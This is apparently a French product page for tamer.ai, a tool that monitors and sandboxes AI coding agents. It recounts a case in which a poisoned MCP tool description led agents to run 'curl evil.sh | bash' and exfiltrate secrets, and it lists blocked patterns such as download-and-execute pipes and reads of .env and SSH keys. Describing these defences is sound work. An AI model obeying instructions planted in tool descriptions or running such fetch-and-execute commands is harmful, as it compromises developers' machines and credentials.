Cas d'utilisation
concrets

Les agents IA sont puissants — mais sans contrôle, ils sont dangereux. Voici comment tamer.ai protège de vraies équipes dans des situations réelles.

Voir les cas ↓
CAS 1

Protection Supply Chain

Comment tamer.ai bloque les attaques supply chain exploitant les agents IA avant qu'elles n'atteignent votre machine.

Le problème

En février 2026, l'incident hackerbot-claw a révélé un nouveau vecteur d'attaque : un serveur MCP malveillant publié comme outil légitime a poussé des agents IA à exécuter des commandes curl | sh, téléchargeant et exécutant du code arbitraire sur les machines des développeurs.

L'agent suivait les instructions de la description empoisonnée — il n'avait aucun moyen de savoir que le payload était malveillant. Des milliers de machines ont été compromises avant que le package ne soit signalé.

La solution tamer

Détection Download & Execute — bloque curl | sh, wget | bash et les patterns d'exécution chaînée en temps réel
Garde anti-exfiltration — détecte l'envoi de fichiers, variables d'environnement ou identifiants vers des endpoints inconnus
Protection CI/CD — empêche les modifications non autorisées de .github/workflows/ et .gitlab-ci.yml
Blocage d'accès aux credentials — empêche la lecture de .env, clés API et clés SSH, quelle que soit l'intention de l'agent

Flux d'attaque — avec et sans tamer

Sans tamer
Outil MCP malveillant Agent
"Installe cette dépendance"
curl evil.sh | bash
Payload exécuté librement
Secrets exfiltrés
Avec tamer
Outil MCP malveillant Agent
"Installe cette dépendance"
curl evil.sh | bash
BLOQUÉ : pattern download_exec
Alerte envoyée sur votre téléphone
CAS 2

Supervision Multi-Agents

Faites travailler une équipe d'agents IA en parallèle — avec un Master qui les coordonne et garde le contrôle.

Le problème

Faire tourner plusieurs agents IA sur le même code mène au chaos : éditions conflictuelles, travail en double, des prompts d'approbation qui bloquent votre terminal, et aucune visibilité sur ce que chaque agent fait réellement.

Sans coordination, deux agents peuvent modifier le même fichier simultanément, créant des conflits que ni l'un ni l'autre ne peut résoudre. Vous finissez par surveiller chaque terminal au lieu de livrer du code.

La solution tamer

Master Agent — un superviseur IA qui orchestre les workers, détecte les conflits et gère les approbations automatiquement
Détection de conflits — suit chaque fichier touché par chaque worker et alerte avant les collisions
Pipelines par rôle — assignez des rôles codeur, relecteur, testeur. Claude code, Gemini teste, Aider relit — automatiquement
Apprentissage de patterns — le Master apprend de vos décisions d'approbation et auto-approuve les patterns sûrs la fois suivante

Architecture pipeline multi-agents

Master Agent
orchestre • détecte les conflits • approuve
Claude Code
codeur
Gemini CLI
testeur
Aider
relecteur
Votre Téléphone
dashboard • approuver • intervenir
CAS 3

Sandbox Kernel

Confinez chaque agent IA dans un périmètre imposé par le kernel — même s'il tente de s'en échapper.

Le problème

Les hooks applicatifs peuvent être contournés. Un agent IA avec accès shell peut lancer un sous-processus Python, ouvrir des fichiers directement, ou utiliser des appels système qui passent sous vos hooks de sécurité.

Vos clés ~/.ssh, credentials ~/.aws et fichiers .env sont tous accessibles — l'agent n'a besoin que du chemin.

La solution tamer

Landlock LSM (Linux) — contrôle d'accès filesystem au niveau kernel. L'agent ne peut physiquement pas lire de fichiers hors de son workspace.
seccomp-BPF — filtrage des appels système : bloque les sockets réseau, ptrace, mount et l'escalade de privilèges.
Job Object (Windows) — confinement de processus avec limites de ressources et garantie de nettoyage à la fermeture.
Défense en profondeur — les hooks gèrent le quotidien (alertes, approbations). Le sandbox kernel est le dernier mur qui ne tombe jamais.

Modèle de défense en couches

Votre machine
Sandbox kernel
Landlock + seccomp + bubblewrap — mur porteur
Path Protection
Hooks — alertes, approbations, règles fines
Agent IA
Confiné au workspace uniquement
CAS 4

Moteur de Skills

Écrivez une compétence une fois, utilisez-la sur tous vos agents — Claude Code, Cursor, Windsurf ou tout outil CLI.

Le problème

Chaque agent IA a son propre format d'instructions : Claude Code utilise CLAUDE.md, Cursor utilise .cursorrules, Windsurf utilise .windsurfrules. Si vous changez d'agent ou en utilisez plusieurs en pipeline, vous maintenez les mêmes connaissances dans des formats incompatibles.

Les équipes perdent des heures à dupliquer guidelines de code, checklists de relecture et workflows de debug dans des fichiers de config spécifiques à chaque agent.

La solution tamer

Format canonique — un fichier Markdown par skill avec frontmatter structuré. Écrivez une fois, tamer le transforme pour chaque agent.
Adaptateurs multi-agents — transformateurs intégrés pour Claude Code (injection CLAUDE.md), Cursor (.cursorrules), Windsurf (.windsurfrules) et un fallback générique.
Gestion en CLItamer skill install, tamer skill list, tamer skill remove. Simple et familier.
Auto-install — les skills peuvent être pré-installés au tamer connect via config. Toute votre équipe reçoit les mêmes skills, à chaque fois.

Un skill, tous les agents

Skill canonique (format tamer)
---
name: debug-react
trigger: "debug React"
agents: [claude, cursor, windsurf]
---
# Debug React Components
1. Vérifier l'error boundary...
2. Valider les deps du hook...
Transformé pour chaque agent
Claude Code → injecté dans CLAUDE.md
Cursor → fusionné dans .cursorrules
Windsurf → fusionné dans .windsurfrules
Générique → répertoire .tamer/skills/

Prêt à dompter vos agents ?

Trois commandes pour une protection complète.

$ curl -fsSL https://server.tamer-ai.dev/install.sh | bash
$ tamer init
$ tamer claude